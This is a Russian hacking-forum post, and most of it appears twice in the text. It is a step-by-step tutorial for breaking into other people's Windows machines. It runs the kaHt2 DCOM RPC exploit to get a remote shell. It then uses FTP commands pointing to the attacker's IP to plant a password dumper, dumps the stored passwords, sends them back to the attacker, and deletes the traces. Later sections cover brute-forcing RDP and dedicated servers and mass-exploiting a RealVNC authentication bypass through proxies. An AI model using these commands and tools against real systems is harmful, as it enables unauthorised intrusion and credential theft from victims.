Xcontrol212
20.05.2008, 20:06
1.эксплоит который мы рассмотрим это kaht2...........
Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия):aggressive:,pablos_ftp_server
1.52 ну и сакм кахт2
Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.
EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом
@Echo off
6.exe Export.txt
и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.
Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.
Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
Далее появляется текст: C:>C:kahHt2.exe
Продолжаем эту строку: пробел
Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой)
Жмём Enter.
Перед Вами появляется:
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
____________________________________________
[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS
[+] Attacking Port: 135. Remote Shell port: 32968
[+] Scan In Progress...
- Connecting to 192.168.0.8
Sending Exploit to a [WinXP] Server... FAILED
- Connecting to 192.168.0.13
ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится :
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:windowssystem32>
Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32.
Далее в консоли пишем:
cd.. Жмём Enter видим C:windows>
cd..Жмём Enter видим C:
Теперь с помощью команды cd program files перейдём в папку С:Program Files.
Видим:
C:Program files сюда мы перешли чтоб особо не палится
Далее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7
Пишем в консоли:
C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt
жмем Enter
Видим: C:Program files>
Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки:
open 57.66.158.44
a
a
Буквы a, это имя и пароль которые Вы создали в FTPServer`е.
Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.
Теперь коннектим удалённый комп к себе по FTP.
Пишем в командной строке:
C:Program files>ftp -s:go.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.
Пишем get 6.exe жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR 6.exe
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee
В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR Export.bat
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee
Всё, мы отправили необходимые файлы на комп жертвы.
Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.
и снова мы видим:
C:Program files>
Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt
Для больше уверенности в том что export.txt уже создан наберите в консоли:
C:Program files>dir
И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.
И наконец последний шаг.
Снова коннектим комп по ФТП:
C:Program files>ftp -s:go.txt жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
Вы снова увидите:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
Сразу после этого в консоли вводите:
send export.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR export.txt
[1456] 150 Opening BINARY mode data connection for file transfer.
[1456] 226 Transfer complete
Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt
Далее заметаем следы:
пишем bye жмём ввод
И снова видим:
C:Program files>
Далее поочерёдно вводим команды для удаления закаченных нами файлов:
del go.txt
del 6.exe
del export.bat
del export.txt
Скачать кахт можнотут (http://xakep.moy.su/load/0-0-1-39-20)
2.Брут дедиков
Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc
Рассмотрим некоторые брутеры дедиков:
Самый известный брутер для дедиков это Ntscan (http://www.downloads.xclan.ru/soft/ntscan10.rar)
Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).
TSGrinder 2.03
Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient".
DownLoad (http://www.securitylab.ru/software/download/index.php?page=269176&el=2636788&file=http://examples.oreilly.com/networksa/tools/tsgrinder-2.03.zip)
Также дедики можно брутить прогой Hydra
3.[/B]Добыча дедиков от Te$t[/B]
Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я не буду описывать принцип работы с этой программой,
но вы знайте, что все действия я проделываю именно через нее...
Начнем.
Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner,
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер,
где он нам выдаст следущую информацию:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe
================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========
[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|
[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|
[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited
X:\>
Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt,
куда сохраняются все результаты программы. Открываем и видим:
---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----
из результата видно, что сканер понятным образом сохраняет результаты, где бажные
сервера подписаны как VULNERABLE, с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)
Способ №2
Ищем и качаем программу DSNS v. 1.0
http://i014.radikal.ru/0803/a1/8c7b6b326008.jpg
очень хороший между прочим сканер портов .
Вбиваем диапазон, порт и ждем, через некоторое время сканер
выдает нам много открытых портов =). После окончания сканировнаия, сохраняем
данный диапазон в Results\Export results одним диапазоном, без портов.
Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что
насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все.
Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты.
Ссылки на скачивание:
RealVNC Bypass Authentication Scanner (http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar)
DSNS v. 1.0 (http://update.dsns.net/binaries/dsns123.zip)
(С)Собрал способы DUN
Для того,чтобы прваильно заюзать эксплоит нам нужна программа PassViev (только PRO версия):aggressive:,pablos_ftp_server
1.52 ну и сакм кахт2
Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.
EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом
@Echo off
6.exe Export.txt
и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.
Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.
Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).
Далее появляется текст: C:>C:kahHt2.exe
Продолжаем эту строку: пробел
Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой)
Жмём Enter.
Перед Вами появляется:
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
____________________________________________
[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS
[+] Attacking Port: 135. Remote Shell port: 32968
[+] Scan In Progress...
- Connecting to 192.168.0.8
Sending Exploit to a [WinXP] Server... FAILED
- Connecting to 192.168.0.13
ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится :
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:windowssystem32>
Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32.
Далее в консоли пишем:
cd.. Жмём Enter видим C:windows>
cd..Жмём Enter видим C:
Теперь с помощью команды cd program files перейдём в папку С:Program Files.
Видим:
C:Program files сюда мы перешли чтоб особо не палится
Далее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7
Пишем в консоли:
C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt
жмем Enter
Видим: C:Program files>
Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки:
open 57.66.158.44
a
a
Буквы a, это имя и пароль которые Вы создали в FTPServer`е.
Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.
Теперь коннектим удалённый комп к себе по FTP.
Пишем в командной строке:
C:Program files>ftp -s:go.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.
Пишем get 6.exe жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR 6.exe
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee
В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR Export.bat
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee
Всё, мы отправили необходимые файлы на комп жертвы.
Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.
и снова мы видим:
C:Program files>
Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txt
Для больше уверенности в том что export.txt уже создан наберите в консоли:
C:Program files>dir
И Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.
И наконец последний шаг.
Снова коннектим комп по ФТП:
C:Program files>ftp -s:go.txt жмём Enter
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
Вы снова увидите:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
Сразу после этого в консоли вводите:
send export.txt
В своём FTP сервере, в раздел Server Log ты должен увидеть следующее:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR export.txt
[1456] 150 Opening BINARY mode data connection for file transfer.
[1456] 226 Transfer complete
Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt
Далее заметаем следы:
пишем bye жмём ввод
И снова видим:
C:Program files>
Далее поочерёдно вводим команды для удаления закаченных нами файлов:
del go.txt
del 6.exe
del export.bat
del export.txt
Скачать кахт можнотут (http://xakep.moy.su/load/0-0-1-39-20)
2.Брут дедиков
Как мы все знаем брутер это самый эффективный и тупой метод взлом асек,дедиков and etc
Рассмотрим некоторые брутеры дедиков:
Самый известный брутер для дедиков это Ntscan (http://www.downloads.xclan.ru/soft/ntscan10.rar)
Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).
TSGrinder 2.03
Программа для подбора паролей к MS RDP службе. Поддерживает множество потоков, баннеры входа в систему, l33t преобразование. Программа требует установки Microsoft Simulated Terminal Server Client tool, "roboclient".
DownLoad (http://www.securitylab.ru/software/download/index.php?page=269176&el=2636788&file=http://examples.oreilly.com/networksa/tools/tsgrinder-2.03.zip)
Также дедики можно брутить прогой Hydra
3.[/B]Добыча дедиков от Te$t[/B]
Первое, что нам нужно это прямые руки, свежая или чуть пьяная голова =)
FreeCap - Предназначен для соксификации программ не умеющих работать с
прокси серверами самостоятельно. Пару SOCKS-проксов для безопасности, а
лучше цепочку . Здесь я не буду описывать принцип работы с этой программой,
но вы знайте, что все действия я проделываю именно через нее...
Начнем.
Искать мы будем vnc-server т.е. Virtual Network Computing.
Первое что нам нужно, это хороший VNC-сканер, я знаю 2 сканера:
это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner
Свой выбор я оставил за RealVNC Bypass Authentication Scanner,
т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак скачиваем данный сканер, распаковываем его к примеру в: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер,
где он нам выдаст следущую информацию:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe
================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========
[+] Usage: VNC_bypauth <target> <scantype> <option>
[-] <target>:
___________________
|___-p____|___-i____|
[-] <scantype>:
____________________
|___-cT___|___-vnc___|
[-] <option>:
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|
[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations
[+] To increase the speed under linux, try ulimit -s unlimited
X:\>
Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляеться файл VNC_bypauth.txt,
куда сохраняются все результаты программы. Открываем и видим:
---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----
из результата видно, что сканер понятным образом сохраняет результаты, где бажные
сервера подписаны как VULNERABLE, с такими мы и будем работать...
Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она
позволяет подключится к бажному серверу, на подобии
Подключение к удаленному рабочему столу(mstsc.exe)
Способ №2
Ищем и качаем программу DSNS v. 1.0
http://i014.radikal.ru/0803/a1/8c7b6b326008.jpg
очень хороший между прочим сканер портов .
Вбиваем диапазон, порт и ждем, через некоторое время сканер
выдает нам много открытых портов =). После окончания сканировнаия, сохраняем
данный диапазон в Results\Export results одним диапазоном, без портов.
Теперь настала очередь программы VNCMASS, в которую мы вбиваем только что
насканеные диапазоны и давим Start All. Программа прочекает и автоматически подключиться к бажным дедикам.. Вот и все.
Советую работать со сканерами через дедики, т.к. вбили диапазон и пошли спать, а наутро подключились и смотрим результаты.
Ссылки на скачивание:
RealVNC Bypass Authentication Scanner (http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar)
DSNS v. 1.0 (http://update.dsns.net/binaries/dsns123.zip)
(С)Собрал способы DUN